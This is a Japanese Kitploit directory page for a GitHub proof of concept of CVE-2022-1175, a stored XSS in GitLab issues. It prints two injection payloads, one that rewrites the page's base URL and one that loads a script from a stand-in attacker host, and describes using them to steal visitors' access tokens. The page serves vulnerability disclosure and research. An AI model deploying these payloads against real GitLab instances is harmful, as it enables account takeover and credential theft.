Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-1175 | Kitploit
ツール/GitHubGitHub/greenwolf/cve-2022-1175
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubgreenwolf/cve-2022-1175

CVE-2022-1175

リポジトリを見る
114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-1175

GitLab の格納型 XSS (Stored XSS)。自分のプロジェクトまたは他のユーザーのプロジェクトの issue に設定できます。issue を訪れた任意のユーザーの Personal Access Token (PAT) を作成・窃取するなどの攻撃が可能です。窃取した PAT は、そのユーザーとしての完全な GitLab API アクセスを提供し、アカウントの完全乗っ取りに相当します。

プロジェクトのベース (base) を自身のサイトに変更することで悪用でき、スクリプトが自身のサイトから読み込まれるようにできます。ページ内で呼び出されているスクリプト名に合わせて、自身のサイト上の JavaScript を変更します。ただし、これによりページ上の動作が壊れる可能性があります。

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

サイトの CSP ポリシーによっては、標準のスクリプトインクルードも機能します。こちらはよりステルス性が高いです。

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>

GitLab の開発者は、うまいことに完全な XSS 文字列をコード内に含めており、以下で確認できます:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

参考:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

ツールをダウンロード